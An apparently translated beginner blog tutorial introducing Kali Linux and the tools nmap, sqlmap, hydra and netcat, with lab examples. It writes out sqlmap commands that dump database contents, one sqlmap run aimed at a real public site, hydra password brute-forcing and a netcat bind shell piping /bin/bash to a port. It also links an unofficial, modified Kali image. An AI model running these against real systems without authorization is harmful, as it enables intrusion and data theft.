If you are a hacker in the Year of the Dragon, choose Dragon Software [Kali Linux], from beginner to proficient

Table of contents

Preface

1. What is kali linux?

2. Install and download kali

3. Introduction to common tools in kali

1.nmap

2.sqlmap

3.hydra

4.netcat

Summarize

Preface

I believe that many students have heard of the kali system when they learned about and studied network security . Everyone calls it the favorite system of hackers. So what is kali and what beginners can do with kali. I will do a simple introduction in this article introduce

1. What is kali linux?

Kali Linux is a Linux operating system specifically used for penetration testing , which was developed from BackTrack . After integrating IWHAX, WHOPPIX and Auditor, three types of Live Linux dedicated to penetration testing, BackTrack was officially renamed Kali LInux. Yes, the essence of Kali is also a Linux system. Just like hackers in the past often used some tools, over time everyone jointly developed an open source system that integrates various hacking tools. As for why hackers like to use Kali, the main reason is that Kali has a complete set of tools and avoids the trouble of downloading and installing tools when they need to be used.

2. Install and download kali

Kali’s official website address: https://www.kali.org

Kali is still being updated. The latest kali system is kali purple, which inherits more tools used by the defender. If there are students who have difficulty accessing or don't know how to operate, you can download my Baidu network disk. The system in it has been briefly processed by me (changing apt source, changing Chinese), etc. Baidu Netdisk: https://pan.baidu.com/s/18hirvdGXWqawrU2EdnJlgA?pwd=8as6

Just download and unzip it and open it with vm. The default root account password is kali, kali. Students who have not used VMware can first go online to learn how to download vm. In addition, novices may encounter the problem that the virtual machine does not have a network. For novices, I recommend choosing direct connection when configuring the network card. After learning about the network segment of the network card, you can configure the desired network card information yourself. (Virtual machine in the upper left corner, settings, network adapter, bridge mode, copy physical network connection status)

3. Introduction to common tools in kali

As mentioned just now, Kali integrates a large number of hacking tools and network security-related tools. It can be said that everything a hacker needs to do has tools in this system. Below I recommend a few gadgets that novices can use to get started.

1.nmap

Nmap, known as the Eye of the Gods, is a very powerful network detection tool that can realize host discovery and port scanning. At the same time, it can also have vulnerability scanning scripts to complete vulnerability scanning of host ports.

The most basic usage of nmap:

nmap [目的ip]
nmap 192.168.1.10

nmap [目的网段]
nmap 192.168.1.0/24

nmap also provides a large number of parameters that can be set during scanning. Here are some examples of commonly used parameters:

-p scans the specified port

-sV detect service/version information

-sT Scan using TCP

-sS Scan using TCP's SYN

-sU UDP scan

-A enables os detection and detects the target operating system

-SC Equivalent to --script=defult use default script

Adding parameters can display different scan results

For more detailed usage of nmap, please refer to this link: https://blog.csdn.net/smli_ng/article/details/105964486

2.sqlmap

sqlmap is an automated sql injection detection tool for sql injection vulnerabilities. It supports vulnerability detection in multiple operating system environments and multiple databases. Penetration testers often joke, "Without any operating skills, it's just sqlmap that studs, and the screen turns green." Just get off work directly”

Basic use of sqlmap:

sqlmap -u "www.baidu.com"

Please try not to batch scan public network assets without authorization, and be careful when stepping on sewing machines.

Below I take the shooting range in sqli-lab as an example:

The green information in the picture indicates that sqlmap has successfully injected the parameter. Note that the parameter id (/?id) is entered in the GET method at the end of my URL. If the parameter is not provided to sqlmap, sqlmap cannot be used.

The steps after finding the injection point are basically determined.

 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  --dbs  #获取当前数据库服务所开启的数据库名称
 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 --tables  #获取某数据库下的所有表名
 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段
sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 -C 字段名 --dump  #将该字段的内容全部获取出来并存储，在最后的信息中会有存储路径信息

The first step is to obtain the database:

The second step is to obtain the table name under the database:

The third step is to obtain the fields of the table (in fact, when it comes to the table name, you can directly –dump to obtain all the contents of the table)

Therefore, the difficulty in using sqlmap is how to find the injection point, that is, to find the parameters that generate sql injection. In the example, the parameter is the "id" parameter uploaded in GET mode. Here are some commonly used parameters of sqlmap

-p specifies test parameters

-u specifies the target URL. If you do not specify parameters with -p, you need to provide GET parameters. To upload GET parameters, add "?id=1" after the URL.

-r loads the url request in the file. Usually for the injection of POST parameters, the file is an http message and can be obtained through burpsuite and wireshark packet capture.

–dbs Get database

–level= specifies the level of testing (1-5, default is 1)

–risk= Specify the risk of the test (0-3, default is 1)

–os-shell interactive system shell

For detailed tutorials, please refer to: https://blog.csdn.net/smli_ng/article/details/106026901

3.hydra

Hydra, also known as Hydra, is a very efficient blasting tool that can be used for multiple protocols. To blast the specified service of the specified IP, you need to enter the dictionary used for blasting or specify the data used for blasting (for example, in a known Password cracking when the account is admin)

In kali, hydra can be used in two ways: graphical and command line.

For novices, the graphical interface is easier and easier to use. The following is an introduction to graphical use.

Then just select start, and hydra will use all the account passwords in the dictionary to make a login blast attempt.

Of course, this is the simplest way to use hydra. Hydra can also be used in different situations by setting parameters. The following is a detailed command line link for hydra: https://zhuanlan.zhihu.com/p/397779150

4.netcat

Netcat, referred to as nc, is currently the most commonly used network tool. It provides network usage for TCP and UDP connections based on socket protocol sockets. When you have the right to use nc, you can establish almost any type of connection. It is usually used in penetration testing. Tool to obtain the shell of the destination IP

Simple way to use nc: establish a connection to transfer information

Host 1: Enable monitoring of port 6666

nc -lvp 6666

Parameter explanation:

-l listen

-v show detailed information

-p specifies port

Host 2: Connect to port 6666 of host 1

nc 192.168.0.163 6666

Commonly used uses of nc: Get the remote host shell

1. Forward connection shell

Host 1:

nc -lvp 6666 -e /bin/bash

Parameter explanation:

-e program redirection

Here, /bin/bash of host 1 is redirected to port 6666 of the own host.

Host 2:

nc 192.168.0.163 6666

You can think about why there is the following error on the left? And when executing sudo su to try to enter root permissions, you must enter the password on the left host before you can enter. After entering, you will receive the password kali from the right and an error will be reported. You can try to understand the differences between different terminals bash/zsh/sh